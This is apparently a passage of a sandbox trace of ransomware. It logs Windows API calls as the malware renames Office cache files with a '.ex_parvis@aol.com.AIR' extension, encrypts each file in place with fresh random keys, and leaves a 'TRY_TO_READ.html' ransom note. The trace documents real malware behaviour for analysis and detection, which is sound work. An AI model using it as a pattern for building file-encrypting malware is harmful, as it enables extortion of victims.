	[0101.594] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0101.596] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4fc
	[0101.596] GetProcessHeap () returned 0x540000
	[0101.596] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0101.596] GetFileSizeEx (in: hFile=0x4fc, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=881152) returned 1
	[0101.596] SetFilePointer (in: hFile=0x4fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xd7200
	[0101.596] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0101.596] GetProcessHeap () returned 0x540000
	[0101.596] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0101.596] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0101.596] WriteFile (in: hFile=0x4fc, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0101.598] WriteFile (in: hFile=0x4fc, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0101.598] WriteFile (in: hFile=0x4fc, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0101.598] ReadFile (in: hFile=0x4fc, lpBuffer=0x3c20020, nNumberOfBytesToRead=0xd7200, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0xd7200, lpOverlapped=0x0) returned 1
	[0101.680] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0101.680] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0101.680] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab", dwFileAttributes=0x80) returned 1
	[0101.681] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 82
	[0101.681] GetProcessHeap () returned 0x540000
	[0101.681] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10a) returned 0x57fb28
	[0101.681] lstrcpyW (in: lpString1=0x57fb28, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab"
	[0101.681] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.12781717671972518758.ex_parvis@aol.com.AIR"
	[0101.681] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0101.683] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4fc
	[0101.683] GetProcessHeap () returned 0x540000
	[0101.683] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57fb28 | out: hHeap=0x540000) returned 1
	[0101.683] GetFileSizeEx (in: hFile=0x4fc, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=13642474) returned 1
	[0101.683] SetFilePointer (in: hFile=0x4fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xd02aea
	[0101.683] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0101.683] GetProcessHeap () returned 0x540000
	[0101.683] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0101.683] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0101.684] WriteFile (in: hFile=0x4fc, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0101.686] WriteFile (in: hFile=0x4fc, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0101.686] WriteFile (in: hFile=0x4fc, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0101.686] ReadFile (in: hFile=0x4fc, lpBuffer=0x3c20020, nNumberOfBytesToRead=0xd02aea, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0xd02aea, lpOverlapped=0x0) returned 1
	[0102.413] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd7977e70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xd7977e70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5dabb0
	[0102.413] FindNextFileW (in: hFindFile=0x5dabb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf2bda830, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xd7977e70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xd7977e70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0102.413] FindNextFileW (in: hFindFile=0x5dabb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x35aa7000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x35aa7000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf3076b00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1416b54, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.cab", cAlternateFileName="")) returned 1
	[0102.413] FindNextFileW (in: hFindFile=0x5dabb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2e3b660, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd8400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.msi", cAlternateFileName="")) returned 1
	[0102.413] FindNextFileW (in: hFindFile=0x5dabb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf2bd90c0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proof.xml", cAlternateFileName="")) returned 1
	[0102.413] FindNextFileW (in: hFindFile=0x5dabb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd7977e70, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xd7977e70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xd7977e70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0102.413] FindNextFileW (in: hFindFile=0x5dabb0, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd7977e70, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xd7977e70, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xd7977e70, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0
	[0102.413] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0102.413] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0102.413] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", dwFileAttributes=0x80) returned 1
	[0102.414] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned 82
	[0102.414] GetProcessHeap () returned 0x540000
	[0102.414] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10a) returned 0x5db238
	[0102.414] lstrcpyW (in: lpString1=0x5db238, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml"
	[0102.414] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.12781717671972518758.ex_parvis@aol.com.AIR"
	[0102.414] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0102.417] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x500
	[0102.417] GetProcessHeap () returned 0x540000
	[0102.417] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db238 | out: hHeap=0x540000) returned 1
	[0102.417] GetFileSizeEx (in: hFile=0x500, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1458) returned 1
	[0102.417] SetFilePointer (in: hFile=0x500, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x5b2
	[0102.417] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0102.417] GetProcessHeap () returned 0x540000
	[0102.417] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0102.417] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0102.418] WriteFile (in: hFile=0x500, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0102.421] WriteFile (in: hFile=0x500, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0102.421] WriteFile (in: hFile=0x500, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0102.421] ReadFile (in: hFile=0x500, lpBuffer=0x5fb388, nNumberOfBytesToRead=0x5b2, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fb388*, lpNumberOfBytesRead=0x3a1f778*=0x5b2, lpOverlapped=0x0) returned 1
	[0102.421] SetFilePointer (in: hFile=0x500, lDistanceToMove=-1458, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0102.421] WriteFile (in: hFile=0x500, lpBuffer=0x607bb8*, nNumberOfBytesToWrite=0x5b2, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x607bb8*, lpNumberOfBytesWritten=0x3a1f778*=0x5b2, lpOverlapped=0x0) returned 1
	[0102.421] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0102.421] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0102.421] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi", dwFileAttributes=0x80) returned 1
	[0102.422] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned 82
	[0102.422] GetProcessHeap () returned 0x540000
	[0102.422] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10a) returned 0x5db238
	[0102.422] lstrcpyW (in: lpString1=0x5db238, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi"
	[0102.422] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0102.422] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0102.424] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x500
	[0102.424] GetProcessHeap () returned 0x540000
	[0102.424] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db238 | out: hHeap=0x540000) returned 1
	[0102.424] GetFileSizeEx (in: hFile=0x500, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=885760) returned 1
	[0102.424] SetFilePointer (in: hFile=0x500, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xd8400
	[0102.424] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0102.424] GetProcessHeap () returned 0x540000
	[0102.424] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0102.424] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0102.424] WriteFile (in: hFile=0x500, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0102.426] WriteFile (in: hFile=0x500, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0102.426] WriteFile (in: hFile=0x500, lpBuffer=0x596400*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x596400*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0102.426] ReadFile (in: hFile=0x500, lpBuffer=0x3c20020, nNumberOfBytesToRead=0xd8400, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3c20020*, lpNumberOfBytesRead=0x3a1f778*=0xd8400, lpOverlapped=0x0) returned 1
	[0102.458] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8568 | out: pbBuffer=0x5b8568) returned 1
	[0102.458] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596400 | out: pbBuffer=0x596400) returned 1
	[0102.458] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab", dwFileAttributes=0x80) returned 1
	[0102.458] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned 82
	[0102.458] GetProcessHeap () returned 0x540000
	[0102.458] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10a) returned 0x5db238
	[0102.458] lstrcpyW (in: lpString1=0x5db238, lpString2="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab"
	[0102.458] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.12781717671972518758.ex_parvis@aol.com.AIR"
	[0102.458] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0102.461] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x500
	[0102.461] GetProcessHeap () returned 0x540000
	[0102.461] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5db238 | out: hHeap=0x540000) returned 1
	[0102.461] GetFileSizeEx (in: hFile=0x500, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=21064532) returned 1
	[0102.461] SetFilePointer (in: hFile=0x500, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x1416b54
	[0102.461] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0102.461] GetProcessHeap () returned 0x540000
	[0102.461] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8670
	[0102.461] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8670*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0102.461] WriteFile (in: hFile=0x500, lpBuffer=0x5b8670*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8670*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
